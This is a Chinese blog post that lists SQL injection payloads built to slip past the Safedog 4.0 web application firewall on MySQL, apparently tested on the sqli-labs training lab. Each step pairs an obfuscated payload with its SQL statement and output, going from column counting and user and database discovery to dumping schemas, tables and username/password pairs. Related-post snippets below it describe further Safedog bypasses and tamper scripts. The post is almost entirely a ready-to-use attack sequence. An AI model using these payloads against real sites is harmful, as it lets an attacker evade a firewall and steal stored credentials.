waf绕过之安全狗4.0_payload

已于 2023-07-23 18:13:13 修改
阅读量352 收藏 1
点赞数
分类专栏: waf绕过 文章标签: 安全 数据库 mysql
于 2022-11-26 21:05:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36585338/article/details/128057131
版权

safedog4.0_waf绕过

#数据库:MySQL

payload:猜字段
' order /*//--/*/ by 3--+
sql语句:
SELECT * FROM users WHERE id='1' order /*//--/*/ by 3-- ' LIMIT 0,1
回显:
Your Login name:Dumb
Your Password:Dumb

payload:测回显
-1' union /*//--/*/ /*!--+*/%0aselect/*!1,2,3*/--+
sql语句:
SELECT * FROM users WHERE id='-1' union /*//--/*/ /*!-- */ select/*!1,2,3*/-- ' LIMIT 0,1
回显:
Your Login name:2
Your Password:3

payload:收集信息	当前用户
-1' union /*//--/*/ /*!--+*/%0aselect/*!1,*/user /*//--/*/(),3--+
sql语句:
SELECT * FROM users WHERE id='-1' union /*//--/*/ /*!-- */ select/*!1,*/user /*//--/*/(),3-- ' LIMIT 0,1
回显:
Your Login name:root@localhost
Your Password:3

payload:收集信息	当前数据库
-1' union /*//--/*/ /*!--+*/%0aselect/*!1,*/user /*//--/*/(),database/*//--+/*/ ()--+
sql语句:
SELECT * FROM users WHERE id='-1' union /*//--/*/ /*!-- */ select/*!1,*/user /*//--/*/(),database/*//-- /*/ ()-- ' LIMIT 0,1
回显:
Your Login name:root@localhost
Your Password:security

payload:暴所有库
-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(schema_name)  /*!from*/  /*!--+/*%0ainformation_schema. /*!schemata*/  --+
sql语句:
SELECT * FROM users WHERE id='-1' union /*!-- /* select/*!1,2,*/ group_concat(schema_name) /*!from*/ /*!-- /* information_schema. /*!schemata*/ -- ' LIMIT 0,1
回显:
Your Login name:2
Your Password:information_schema,challenges,mysql,performance_schema,security

payload:暴所有表
-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(table_name)  /*!from*/  /*!--+/*%0ainformation_schema. /*!tables*/ where table_schema='security' --+
sql语句:
SELECT * FROM users WHERE id='-1' union /*!-- /* select/*!1,2,*/ group_concat(table_name) /*!from*/ /*!-- /* information_schema. /*!tables*/ where table_schema='security' -- ' LIMIT 0,1
回显:
Your Login name:2
Your Password:emails,referers,uagents,users

payload:暴指定表下所有字段
-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(column_name)  /*!from*/  /*!--+/*%0ainformation_schema. /*!columns*/ where table_name= 'users' --+
sql语句:
SELECT * FROM users WHERE id='-1' union /*!-- /* select/*!1,2,*/ group_concat(column_name) /*!from*/ /*!-- /* information_schema. /*!columns*/ where table_schema='security' -- ' LIMIT 0,1
回显:
Your Login name:2
Your Password:id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password

payload:暴数据
-1%27%20union%20/*!--+/*%0aselect/*!1,2,*/%20%20group_concat(concat_ws(0x7e,username,password))%20/*!from*/%20security.users--+
sql语句:
SELECT * FROM users WHERE id='-1' union /*!-- /* select/*!1,2,*/ group_concat(concat_ws(0x7e,username,password)) /*!from*/ security.users-- ' LIMIT 0,1
回显:
Your Password:
Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
sql注入绕过安全狗4.0
Bu2n的博客
02-07 5702
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以sqli-labs(Less-1)为例,绕过安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 343
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
Safedog 4.0 bypass绕过
Keepb1ue的博客
02-28 4300
Safedog 4.0 bypass绕过
最新版安全狗(V4.0.2665) sql 注入绕过
qq_41891666的博客
12-01 2278
前言: 之前做测试的时候看见waf 就一脸懵逼,于是决定学一学waf bypass 的技术,这篇文章是关于bypass 安全狗来实现,看了网上的一些文章,然后自己搭了环境,动手实践一下,毕竟纸上得来终觉浅,绝知此事要躬行。 0x00 搭建安全狗环境 准备环境: 虚拟机 win 7 sp1 安全狗最新版本 V4.0.2665 phpstudy v8.1 坑: 安装安全狗的时候, 这个服务名怎么填都不对,网上的一些教程说把phpstudy 先修改为系统服务,但是问题是那是老版本的phpstudy ,现在使用的
mysql联合注入绕过安全狗4.0
https://www.cnblogs.com/zpchcbd/
05-13 1912
环境 win2003 apache mysql php 操作 http://192.168.1.131/Less-1/index.php?id=1 数值型注入 首先判断是否存在注入点 这里使用的是科学记数法 简单粗暴 http://192.168.1.131/Less-1/index.php?id=1e0 不变 http://192.168.1.131/Less-1/index.php?id=1...
SQL注入绕过安全狗waf防火墙,这一篇就够了,8k文案超详细
最新发布
xt350488的博客
07-16 5430
通过本文的详细解析和实验,我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和绕过技巧。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式绕过检测规则,成功实施SQL注入攻击。本文首先通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后,通过拆分和注释符的使用,我们发现WAF可能是通过识别特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。
记录waf绕过
qq_43987112的博客
05-22 828
waf绕过笔记
SQL注入绕过安全狗V4.0(Apache)及POC利用
weixin_43815032的博客
10-11 775
0x01 资源准备: python3.7:python-3.7.4-amd64.exe 安全狗安装包:safedogwzApache.exe (截至10月2号官网上下的apche v4.0最新版) phpStutdy集成环境:phpStudy_64.7z 需要...
sql注入绕过安全狗4.0版本
qq_18193739的博客
07-29 874
sql注入绕过安全狗4.0
SQL-Bypass安全狗4.0
weixin_45716091的博客
10-21 502
实验环境: sqli-labs 网站安全狗Linux-Apache版 版本:V2.3.18809 CentOS7+宝塔面板 apache+php+mysql 注意: 安全狗需要开启记录并拦截,否则只会记录不会拦截,没有弹窗。 这里以sqli-labs的Less-1为例。 判断注入 存在字符型注入。如果没有错误回显,可以输入payload:?id=2-1 等等来判断。 Fuzz: 1' --+- 未拦截(不拦截注释符) 1' and '1'='1 拦截 1' and 1=1 .
服务器安全狗v4.0正式版
07-02
服务器安全狗是一款集服务器安全防护和安全管理为一体的综合性服务器安全防护工具。服务器安全狗功能涵盖了服务器系统优化、服务器漏洞补丁修复、服务器程序守护、风险帐号扫描、DDOS防火墙、ARP防火墙、web防火墙、安全策略设置以及邮件实时告警等多方面功能模块,为用户在服务器运营过程中提供完善的保护,使其免受恶意的攻击、破坏。 服务器安全狗 V4.0版更新内容: 1、防火墙全面改进,提升攻击防护效果(新增针对CC攻击防护功能) 2、新增IP超级黑名单功能 3、悬浮窗全面改进,用户可直接查看协议和拦截IP列表 4、修复极端情况下守护中心失效问题,系统更加稳定可靠 5、文件目录守护功能增加保护规则,加强系统安全保障 6、界面全新优化,增强用户体验 7、安全策略例外IP取消数量限制 8、修复信息窗口流量显示异常问题
安全狗4.0防火墙坑DDOS坑CC攻击
06-10
安全狗4.0防火墙坑DDOS坑CC攻击 网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具,有了它服务器管理员就不必再担心服务器IIS出现故障、服务器受到黑客攻击等苦恼。     网站安全狗具备六大核心功能: 1、智能的网页木马和网页挂马扫描引擎,及时发现和清除木马文件。    2、实时的SQL注入主动防御引擎,及时屏蔽恶意攻击。    3、全面的网站资源保护机制,防止特定文件被非法下载。   4、双层防盗连验证模式,保护网站资源不被非法链接。   5、文件下载多线程数量控制,保护服务器流量资源。   6、URL长度、URL后缀漏洞检测,保护服务器安全
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
08-03
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
服务器安全狗V4.2收藏版
08-05
服务器安全狗V4.2收藏版,现在的版本有很多限制,V4.2无需注册,没有限制,好用!
SQL注入 安全狗apache4.0.26655绕过
crowsec
01-26 1931
微信公众号:乌鸦安全 扫取二维码获取更多信息! 说明 本次靶场采用经典的sqli-labs搭建,waf使用的是安全狗的apache4.0.26655版本,文章从最开始的分析到最后的结果,中间难免会有错误的地方,希望大家多多包涵和理解。 上次我们发了一篇SQL注入-安全狗超大数据包绕过的文章,使用的是安全狗apache3.5.12048版本,这次是4.0系列的版本,全手动注入,后续会带来这方面的视频课程和相关tamper的编写。 因为文章中的靶场搭载了公网上,所以对以前的笔记进行了打码。..
网站安全狗V4.0绕过姿势
干铮的博客
09-27 4108
网站安全狗下载地址: 网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改https://www.safedog.cn/website_safedog.html DVWA下载: 链接:https://pan.baidu.com/s/1XZXC3r_LhtY9s7xJM_NAYQ 提取码:kun6 --来自百度网盘超级会员V3的分享 已DVWA SQL注入为例对网站安全狗进行绕过测试。 1.查看安全狗防御规则匹配库。 2.绕过分析 字符 ...
一次安全狗绕过
weixin_45490166的博客
07-15 341
http://115.159.97.35/sqli-labs-master/Less-1/?id=1 安全狗绕过 参考 https://www.cnblogs.com/Yang34/p/12055052.html ?id=1' order/*!99999asd*/by 3 --+ ?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(schema_name) from information_schema.schemata--+
关于安全狗
gRpc的博客
11-12 367
need system command 'locate' to install safedog for linux 解决办法   yum -y install mlocate =--------------------------------------------- need system command 'lspci' to install safedog for linux 解决办法...
绕过SQL注入安全狗4.0的实战挑战
SQL注入Bypass安全狗4.0是一个关注点在于防范SQL注入攻击的安全防护软件,本文档似乎是在探讨如何通过实际操作来测试或绕过这种安全工具。在给出的源代码片段中,我们可以看到一个PHP应用程序,该程序试图验证用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值